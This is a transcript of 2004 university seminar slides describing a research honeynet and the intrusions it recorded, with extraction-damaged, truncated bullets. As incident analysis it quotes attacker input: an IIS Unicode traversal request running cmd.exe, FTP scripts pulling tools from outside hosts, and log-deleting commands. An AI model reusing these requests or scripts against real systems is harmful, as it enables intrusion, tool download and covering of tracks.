UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso - PowerPoint PPT Presentation

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UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso


Unfortunately there was only enough free space for one of the movies before the ... The attacker then installed the Half-Life server, rebooted the machine, and ... – PowerPoint PPT presentation

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Transcript and Presenter's Notes

Title: UCDPromia Honeynet Project UC Davis Security Lab Seminar April 28, 2004 Adam Carlson email: ajcarlso

UCD/Promia Honeynet ProjectUC Davis Security
Lab SeminarApril 28, 2004Adam Carlsonemail
ajcarlson AT ucdavis.edu
What is a honeypot/honeynet?
  • No widely accepted definition
  • Lance Spitzner defines a honeypot as... an
    information system resource whose value lies in
    unauthorized or illicit use of that resource.1
  • A honeynet is a type of honeypot designed for
  • 1) A honeynet is a network of multiple systems
  • 2) All of the systems are real
  • 1http//www.governmentsecurity.org/articles/Honeyp

Why is a honeynet useful?
  • Not meant to be used
  • Less traffic to inspect
  • No privacy issues
  • Can simulate more complex network
  • Proactive rather than reactive
  • Tests incident response

Promia/UCD honeynet overview
  • Currently 4 honeynet machines
  • HP-1 Red Hat 9.0 Workstation Install
  • HP-2 Red Hat 7.2 Server Install
  • HP-3 Windows 2000 Server
  • HP-4 Windows NT Server ...Connected via a
    sensor (HP-Sensor) running Red Hat 9.0

Configuration Specifics
  • HP-1 Red Hat 9.0
  • Configuration
  • Workstation install
  • Services
  • SSH
  • Syslog
  • FTP
  • HP-2 Red Hat 7.2
  • Configuration
  • Server install
  • Services
  • SSH
  • Telnet
  • Apache
  • mySQL
  • BIND
  • FTP

  • HP-3 Windows 2000 Server
  • Configuration
  • Default install with Service Pack 1
  • Services
  • IIS 5.0 Webserver
  • IIS FTP Server
  • WinVNC Virtual Network Computing server
  • HP-4 Windows NT Server
  • Configuration
  • Default install with Service Pack 4
  • Services
  • IIS 3.0 Webserver
  • IIS FTP Server
  • WinVNC Virtual Network Computing server

Data Capture Methods
  • Windows
  • Comlog command line logging utility
  • Evtsys Event Log to Syslog utility
  • IIS logs
  • Tcpdump traffic
  • New Sebek for Windows

  • Linux
  • Sebek Kernel Module
  • Remote syslog server
  • Tcpdump traffic
  • Tripwire

  • Sensor Configuration
  • Red Hat 9.0
  • Snort 2.0 Snort-inline patch
  • ACID(Analysis Console for Intrusion Databases)
  • Bridge-utils for ethernet bridging
  • OpenSSH

Initial Results
  • Brought online on June 19, 2003
  • 3 initial honeypot machines began receiving
    probes within 40 minutes of being online
  • Suffered chronic worm infestation which resulted
    in 300-400 megabyte tcpdump files
  • Patched against worms and created a fast and easy
    method for restoring computers

What took you so long?
  • First attack came on June 21 at 339 pm, about 76
    hours after the honeynet was brought on line.
  • Directed at Windows NT IIS web server using
    directory traversal URL.
  • Uploaded privilege escalation tool named
    ErunAs2X.exe, remote shell tool nc.exe, and
  • Worm infestation forced us to take down system
    and reinstall the OS.

  • Next attack was on July 3, 2003
  • Directed at vulnerability in Windows 2000
    WebDAV(Web-based Distributed Authoring and
    Versioning) component of the IIS Web server
  • The intruders set up a rogue ftp server listening
    on port 2687 and used it to upload software and
    music files.
  • Attempted to make changes to Windows that we have
    been unable to explain

Why is this intruder trying to update our system
at 1226 am? ... dr-x------ 1 root root
258048 Jul 5 0039 NtServicePackUninstall d
r-x------ 1 root root 4096 Jul 5
0038 Installer -r-------- 1 root root
607 Jul 5 0026 Q815021.log -r-------- 1
root root 1518 Jul 5 0021
OEWABLog.txt dr-x------ 1 root root
4096 Jul 2 2037 Debug ... Q815021.log Servi
ce Pack started with following command line
CheckSystem ServicePack version
Mismatch DoInstallation CheckSystem Failed
0xf076 Setup has detected that the version
of the Service Pack installed on your system is
lower than what is necessary to apply this
hotfix. At minimum, you must have Service Pack 2
installed. Message displayed to the user
Setup has detected that the version of the
Service Pack installed on your system is lower
than what is necessary to apply this hotfix. At
minimum, you must have Service Pack 2
installed. User Input OK

  • Sometime on July 5th the system crashed and was
    unable to boot back into a functioning state.
  • System taken offline and restored but we did not
    correctly diagnose the attack vector
  • Attackers able to compromise system only 3 hours
    after it is brought back online
  • Again set up FTP server and uploaded software and
    music files
  • Continued to compromise and use the machine until
    August 26th, when the WebDAV vulnerability was
    patched against.

Who doesnt love anonymous ftp with write
  • Anonymous connection made to Windows NT FTP
    server on July 5th at 215 am
  • Checks for write permission, then uploads a file
    named 1mbtest.ptf
  • Removed anonymous write permissions before
    attacker could return

Thanks Unicode!
  • On July 19th at 1117 pm our Windows NT server
    became the target of the next attack.
  • The IIS server running on the honeynet machine
    was vulnerable to a directory traversal attack
    using the Unicode encoding system
  • GET /scripts/..255c..255c../winnt/system32/cmd.e
    xe?/cdirc\ HTTP/1.0
  • The attacker lists the contents of all drives,
    then creates an ftp script file
  • open xxx.235.254.67
  • steve
  • jackson
  • binary
  • get lsass.exe
  • get serv-u.ini
  • get command.exe
  • get kill.exe

  • FTP server did not accept username/password
  • Eventually able to get a remote shell on port 99
    using uploaded nc.exe
  • Attacker then downloads p.exe, httpodbc.dll,
    svchost.exe and serv-u.ini
  • Starts Serv-U FTP daemon listing on port 1020
    using svchost.exe and serv-u.ini
  • Uploads more tools via FTP before looking around
  • Discovers hidden directory with our honeypot
    forensics tools
  • Downloads all of the tools and then disconnects

  • Come back briefly 2 times in the next week to
    check the directories they had created
  • 220 am on July 29th upload and install a
    Half-Life Counterstrike game server. Attempt to
    hide directory and install game server as a
  • At 330 am the game server is up and running with
    the title Super Fast California Server.
    Numerous clients immediately start connecting to
    the server.
  • System taken offline at 515pm

HTTPS more secure right?
  • Next attack came July 31st and was directed at
    Red Hat Linux 7.2 OpenSSL module used by Apache
    Web Server
  • Began with a TCP connection to port 443
  • Attacker then sent a bad HTTP request to port 80
    resulting in a 400 Bad Request message in
  • A number of connections are made to port 443 that
    contain the exploit targeting the KEY_ARG
    vulnerability found in the installed version of
  • Execute a privilege elevation exploit and begin
    downloading root kit tools from a remote FTP
  • Install rk rootkit and hidden SSH server
    listening on port 1212

  • Uploaded selena.tgz which contained a fast and
    simple port 443 scanner utility
  • Attempted to scan several class B networks for
    machines with port 443 open.
  • Many connections observed over the next few days
  • Download and install psyBNC IRC place holder
  • System taken offline on August 5th to make image
    of harddrive. Machine would not reboot.

And now more fun with IIS
  • Next attack targeted Microsoft IIS Server WebDAV
    SEARCH overflow vulnerability
  • Began with a series of Echo Ping requests being
    sent to target at 1156 pm on Sept. 8, 2003.
  • This was followed by a SEARCH request that
    exploited a vulnerability in the IIS server
    WebDAV capabilities, resulting in a remote shell
    listening on port 1055
  • Attacker creates an FTP script
  • open xxx.xxx.143.233
  • microsoft
  • microsoft
  • bin
  • get "ntoskrnl.exe" c\winnt\system32\cache\ntoskr
  • get "settingslol.jpg" c\winnt\system32\cache\set
  • get "iislog.exe" c\winnt\system32\cache\iislog.e
  • bye

  • ntoskrnl.exe contains Serv-U FTP daemon
  • settingslol.jpg contains Serv-U configuration
  • iislog.exe contains a program that will delete
    IIS Logs and kill processes on a Windows machine
  • Attacker installs FTP server to listen on port
    2687 and uploads more tools AdmDll.dll,
    iislog.exe, nc.exe, and r_server.exe.
  • Creates remote shell using nc.exe listening on
    port 1234
  • Repeatedly attempts to add a new user to system
    but unsuccessful due to password policy.

  • They then install the r_server.exe program as a
    service. r_server is the server component of the
    Remote Administrator (RA) utility
  • Make r_server connection from 1213 am to 1224
  • Finally after 15 minutes and over 40
    username/password combination the attacker gives
    up on attempting to add an account.
  • Instead adds built in IWAM_HP-3 account to the
    administrator group and disconnects.

Too bad our hard drives come from the bargain
  • Connection is made to Serv-U FTP server later
    that day at 1109 am.
  • Attacker immediately goes to his tools directory
    and deletes all of the uploaded files except for
    the FTP server.
  • At 1113 am a connection is made from a different
    IP address. The attacker uploads and starts an
    FTP script that will download 7 DivX encoded
  • After the download starts, the attacker
  • Unfortunately there was only enough free space
    for one of the movies before the hard drive
    became completely filled.

  • The full hard disk degraded performance and the
    system was taken offline at 725pm on September
  • The movie files were deleted but the rogue FTP
    server was left installed. The system was put
    back online at 1100 pm on September 15th.
  • Attackers returned at 1145 pm on September 16th
    with a connection to the ftp server.
  • The attackers again uploaded a number of tools
    including nc.exe, r_server.exe, and iislog.exe.
  • Two more connections are made at 335 am and
    1122 pm on September 17th
  • Because no new activity was being recorded,
    system was taken offline and patched against
    web-DAV vulnerability.

You can always count on the classics
  • The next attack targeted the wu-ftpd FTP server
    running on the Red Hat 7.2 machine
  • An anonymous connection is made to the FTP
    server. A connection containing an exploit of
    the fb_realpath() off-by-one vulnerability is
    then made.
  • The exploit creates a remote shell and the
    attackers quickly connect
  • The intruders download and install the shkit v4
    rootkit. The rootkit installs trojaned versions
    of ifconfig, ps, ls, netstat, find, top, lsof,
    slocate, dir, md5sum, syslogd, pstree and login.
    Also installs a covert SSH daemon listening on
    port 10.
  • Attackers connect to the hidden SSH daemon and
    download the SucKIT v1.3b kernel-based rootkit
    and the psyBNC IRC bouncer program.

  • Over the next two days the psyBNC IRC program is
    used heavily, but little other activity is
  • Decision was made to take the system offline
    because it looked as if it was going to be used
    for file distribution.

Saving the best for last
  • Last intrusion began at 1145 pm on January 18th
  • Directed at Windows NT MSADC component of IIS
  • Attack began with a series of HTTP GET requests,
    attempting a directory traversal using the
    UNICODE encoding scheme(similar to earlier
  • Attacker then did a port scan of ports 1-3000
  • Connects to anonymous FTP server and lists drive
    contents, then disconnects
  • Attacker spends the next 20 minutes attacking IIS
    attempting to open a command shell
  • At 1219 am the attacker issued a POST request to
    the MSADC component of the IIS web server. The
    POST was successful alerting the attacker that
    the MSADC component was installed.

  • Attacker exploited MSADC vulnerability and at
    115 am issued a command that copied the password
    file C\winnt\repair\sam._ to the public web
    server directory, where it was then downloaded.
  • The attacker then set up a rogue ftp server on
    port 1020 and a remote shell on port 99.
  • Connected to the rogue ftp server, and uploaded a
    file named httpdodbc.dll. This was really the
    iiscrack exploit written by digitaloffense.net.
  • At 145 am the attacker used MSADC to create a
    text file with a list of all files on the system,
    which was then downloaded.

  • At 147 am the attacker used MSADC to copy the
    original version of cmd.exe, named cm_.exe, to
    the IIS web directory.
  • Then uploaded two programs, winamp and mIRC, as
    well as a third file meant to test the target
    computers' bandwidth.
  • At 329 am on January 19th, almost four hours
    after the attack began, the intruder closed all
    connections, leaving only the rogue ftp server
  • A new connection was made at 551 pm that same
    day. The intruder immediately used the ftp
    server to re-open the command shell on port 99.
  • The attacker then uploaded a few more tools
    before attempting to launch a Denial of Service
    attack at 607 pm

  • After a few unsuccessful attempts, the attacker
    launched the DoS, generating over 2.14 gigabytes
    of fragmented IP packets in under 3 minutes. This
    attack continued until 950 pm.
  • An attacker returned at 203 am to the rogue ftp
    server and uploaded more files, including the
    Half Life game server that we had seen in a
    previous intrusion.
  • The attackers also entered the C\winnt\help\tutor
    directory, which was used to keep the ComLog
    cmd.exe shell logs. They deleted only the log
    files that had recorded their actions.
  • The attacker then installed the Half-Life server,
    rebooted the machine, and disconnected at 248
  • The next connection was made as 1229 am on
    January 22nd. An intruder connected to the rogue
    ftp server and uploaded a number of mp3 music
    files to the IIS web server directory.

  • Between January 23rd and January 25th a number of
    successful requests for the mp3 files were made
    from an array of IP addresses
  • Little other activity is recorded until January
    28th when another connection was made and another
    Denial of Service attack was launched using the
    mIRC program.
  • Decision was made to take the system offline
    January 29th.

  • Yes we will be attacked, 357,233 snort alerts and
  • Able to gain tcpdump files containing actual
  • Collected real attack tools that are being used
    in the wild.
  • (We received a workable exploit for the windows
    DCOM RPC vulnerability only a few months after
    the vulnerability surfaced)
  • Leads to more questions

... why are they trying to install hardware
drivers at 1130 pm? ... 2003/07/07 213000
284.2 Munged cmdline msiinst.exe
/delayrebootq EXE name C\WINNT\System32\msiinst.
tmp\msiinst.exe The protected system file
(C\WINNT\System32\msi.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msihnd.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msimsg.dll) was successfully
unprotected. The protected system file
(C\WINNT\System32\msiexec.exe) was successfully
unprotected. 2003/07/07 213535 1332.23 Driver
Install Munged cmdline C\WINNT\system32\wzcsetu
p.exe /i /P EXE name C\WINNT\system32\wzcsetup.e
xe Searching for hardware ID(s)
ms_ndisuio Enumerating files C\WINNT\inf\.inf Fo
und MS_NDISUIO in C\WINNT\inf\ndisuio.inf
Device NDIS Usermode I/O Protocol Driver NDIS
Usermode I/O Protocol Provider Microsoft Mfg
Microsoft Section Install Decorated section
name Install Selected driver installs from
section Install in c\winnt\inf\ndisuio.inf. Chang
ed class GUID of device to 4D36E975-E325-11CE-BFC
1-08002BE10318. Set selected driver. 2003/07/07
213550 1332.86 Driver Install Searching for
hardware ID(s) ms_wzcsvc Enumerating files
C\WINNT\inf\.inf Found MS_WZCSVC in
C\WINNT\inf\netwzc.inf Device Wireless
Configuration Driver Wireless Configuration
Provider Microsoft Mfg Microsoft Section
WZCSVC.ndi Decorated section name
WZCSVC.ndi Selected driver installs from section
WZCSVC.ndi in c\winnt\inf\netwzc.inf. Changed
class GUID of device to 4D36E974-E325-11CE-BFC1-0
8002BE10318. Set selected driver. 2003/07/07
213600 1484.625 Driver Install Munged cmdline
e\f7861adccd4ae\i386\update\update.exe EXE name
e\f7861adccd4ae\i386\update\update.exe Searching
for hardware ID(s) acpi\fixedbutton,fixedbutton
Found ACPI\FixedButton in C\WINNT\INF\machine.inf
Device ACPI Fixed Feature Button Driver ACPI
Fixed Feature Button Provider Microsoft Mfg
(Standard system devices) Section
NO_DRV Decorated section name NO_DRV
Which logging mechanisms will they go after?
TCP hp-3ftp hp-sensor.ucdavis.ed
u32822 ESTABLISHED TCP hp-3http
xxx.w80-8.abo.wanadoo.fr3938 ESTABLISHED TCP
hp-3http xxx.cs.ucdavis.edu16387
xxx.ipt.aol.com4460 ESTABLISHED TCP
hp-3http xxx.ipt.aol.com1825
xxx.prodigy.net.mx3201 ESTABLISHED TCP
hp-3http xxx.ppp.tiscali.fr4931
xxx.18.13.1914598 ESTABLISHED TCP
hp-3http xxx.18.86.784188
xxx.19.25.1753023 ESTABLISHED TCP
hp-3http xxx.71.179.1604550
hp-4.ucdavis.edunetbios-ssn ESTABLISHED c\W
INNT\system32\spool\prtprocs\w32x86\prntSun Jul
20 011648 2003 services stop evtsys Sun Jul 20
011650 2003 Service evtsys stopped. Sun Jul 20
011650 2003 ... c\WINNT\system32\spool\prtprocs
\w32x86\prntSun Jul 20 011825 2003 rmdir
c\winnt\system32\logfiles /q /s Sun Jul 20
011825 2003 Sun Jul 20 011825 2003
Future Work
  • UCD/Promia Honeynet version 2
  • Honeynet goes public
  • More realism create a fictitious UC Davis group
  • Advertise our presence
  • Develop honeynet tools
  • Honeytokens

  • Special thanks to Promia for making this happen
  • Big thanks to Matt Bishop, Tom Ristenpart, and
    Jimmy Zhao for their constant support and help.
  • Monumental thanks to Brennen Reynolds of
    Off-Piste Consulting, who was the original
    designer of this project(and my constant partner
    in crime).
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